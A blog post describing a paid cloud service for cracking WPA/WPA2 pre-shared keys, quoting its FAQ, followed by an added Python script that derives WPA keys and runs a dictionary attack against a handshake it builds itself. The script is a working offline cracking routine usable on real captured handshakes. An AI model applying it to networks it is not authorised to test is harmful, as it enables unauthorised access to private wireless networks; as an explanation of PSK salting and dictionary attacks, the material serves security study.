WPA Crack in the Cloud
Moxie Marlinspike has opened up an ingenious line of business with cloud computing.
He simply has a large cloud compute the WPA key. A job runs in at most 20 to 40 minutes and currently costs only US$17 (half the cluster) or US$34 (the whole cluster).
Excerpt from his FAQ
How much does all this cost?
We offer two different cracking modes at two different prices. You can run your job against half of our CPU cluster for $17 US, or you can run it against the entire cluster for $34 US. The half-mode will take at most 40 minutes to exhaust the entire 135 million word dictionary file (but hopefully we’d find your password before that), whereas the full-mode will take at most 20 minutes. This compares to an average run time of 5 days on a contemporary desktop machine, much longer on a laptop.
What if you don’t find my password?
The job costs the same whether we find your password or not. You’re paying for either the recovery (which is most often the case), or the knowledge that if you were to build an exhaustive 135 million word dictionary file and run your handshake against it for five days, you’d find nothing.
Aren’t there rainbow tables now?
Yes, the Church Of Wifi has put a large rainbow table collection online. However, there are a few ways in which this collection has not met our needs. The first is that since each handshake is salted with the ESSID of the network, you have to build a unique set of rainbow tables for each network that you’d potentially like to audit. The Church Of Wifi has gone to heroic efforts to build tables for the 1000 most popular ESSIDs, but we find that this is often not enough. If someone has enabled WPA encryption on their wireless network, chances are that they’ve changed their ESSID to something that’s not very common as well.
Additionally, since they had to build so many sets, they had to limit the size of their dictionary in order to keep the resulting tables manageable. We feel that 1,000,000 words is really not large enough to do a comprehensive search, and that the way the dictionary was constructed discounts some of the specifics for WPA network password requirements. WPA Cracker provides a service that can crack the PSK of a network with any ESSID, using a dictionary that is several orders of magnitude larger.
Do you use the OpenWall dictionary?
While the OpenWall project has done an excellent job of pushing the envelope on password cracking, in our experience the OpenWall dictionaries were tailored more specifically for Unix logins than for WPA networks. Our dictionary was meticulously compiled with WPA cracking in mind, and includes word combinations, phrases, numbers, symbols, and elite speak. It has worked quite well for us, and now we’re hoping that it can be helpful for you.
What kind of payment do you accept?
We use Amazon Payments. All you need is a normal account with Amazon.com, and you can use it to pay us with a credit card.
How do I capture a WPA handshake?
We recommend checking out the aircrack-ng tutorial.
What do I do if my pcap is greater than 10MB?
You’ll need to use Wireshark or something else to export only the handshake to a smaller file. Remember to leave at least one beacon for your target network in there, though, so that the handshake remains associated with the ESSID you’re targeting.
What kind of information do you collect from me?
All we need is a pcap file with a WPA handshake in it, the ESSID of the network, and an email address to send the results to.
How do I contact you people?
Send an email to moxie@thoughtcrime.org
But I use WPA2 so it’s cool right?
Actually, while WPA2 introduced CCMP mode as a replacement for the problematic TKIP, when run with authentication based on Pre-Shared Keys (PSK), it is still vulnerable to dictionary attacks. Our service works against both WPA and WPA2 when PSK is being used.
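The FAQ explains the two facts the whole service rests on: the PSK is derived from the passphrase with the ESSID as salt (so precomputed tables are per-network), and a captured 4-way handshake is enough to test candidate passphrases offline against the MIC, for WPA and WPA2 alike. The following Python script is an added example and is not WPA Cracker's code; it plays both sides, first producing a message-2 EAPOL-Key frame with a known passphrase (the ANonce, SNonce, MAC addresses, ESSID "HomeNet" and the word list are all constructed here, not captured), then running the attacker's dictionary loop against it. The derivations (PBKDF2-HMAC-SHA1 with 4096 rounds, the 802.11i PRF-512 and the HMAC-MD5/HMAC-SHA1 key MIC) follow the standard; everything else is illustrative.

```python
import hashlib
import hmac

# Added example, not code from WPA Cracker. All handshake material is CONSTRUCTED
# inside this script; nothing here comes from a real capture.

MIC_OFFSET = 81      # byte offset of the Key MIC field in an EAPOL-Key frame
NONCE_OFFSET = 17    # byte offset of the Key Nonce field

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 rounds, 256 bits).
    # The SSID salt is why a precomputed table is only valid for one network name.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    # 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    # Only the first 16 bytes (the KCK) are needed to check the handshake MIC.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:64]

def eapol_mic(kck: bytes, eapol: bytes, wpa2: bool) -> bytes:
    # The MIC covers the whole EAPOL-Key frame with its own MIC field zeroed.
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if wpa2:   # key descriptor version 2 (CCMP): HMAC-SHA1 truncated to 16 bytes
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    return hmac.new(kck, zeroed, hashlib.md5).digest()   # version 1 (TKIP): HMAC-MD5

def build_eapol_msg2(snonce: bytes, mic: bytes, wpa2: bool) -> bytes:
    # Message 2 of the 4-way handshake: carries the SNonce and the first MIC.
    key_info = 0x010A if wpa2 else 0x0109    # MIC | Pairwise | descriptor version 2 or 1
    body = (bytes([2 if wpa2 else 254])      # descriptor type: 2 = RSN (WPA2), 254 = WPA
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")        # key length
            + (1).to_bytes(8, "big")         # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + mic + (0).to_bytes(2, "big"))  # MIC, key data length
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key

def simulate_handshake(passphrase, ssid, wpa2=True):
    # Plays the station with the real passphrase to produce what a sniffer would see:
    # both MACs, the ANonce from message 1 and the MIC-bearing message 2.
    ap_mac = bytes.fromhex("020000000001"); sta_mac = bytes.fromhex("020000000002")  # constructed
    anonce = hashlib.sha256(b"anonce").digest(); snonce = hashlib.sha256(b"snonce").digest()
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    unsigned = build_eapol_msg2(snonce, b"\x00" * 16, wpa2)
    return ap_mac, sta_mac, anonce, build_eapol_msg2(snonce, eapol_mic(kck, unsigned, wpa2), wpa2)

def crack(ssid, ap_mac, sta_mac, anonce, eapol_msg2, wpa2, wordlist):
    # The attacker's side: one PBKDF2 + PRF per candidate, then a 16-byte MIC comparison.
    snonce = eapol_msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    target = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, wpa2), target):
            return candidate
    return None

WORDLIST = ["password", "letmein", "wireless1", "s3cr3tw1f1", "Tr0ub4dor&3"]   # constructed

if __name__ == "__main__":
    ssid = "HomeNet"   # constructed ESSID
    capture = simulate_handshake("s3cr3tw1f1", ssid, wpa2=True)
    print("WPA2 recovered:", crack(ssid, *capture, True, WORDLIST))
    print("same capture, wrong ESSID:", crack("HomeNet2", *capture, True, WORDLIST))
```

The cost per candidate is dominated by the 4096 PBKDF2 rounds, which is what makes a 135 million word list a multi-day job on one machine and a cluster job in the cloud. The second call shows the salting point from the FAQ: the same handshake checked under a different ESSID yields no match even though the passphrase is in the list, which is also why a pcap submitted to the service must still carry a beacon that ties the handshake to the right ESSID.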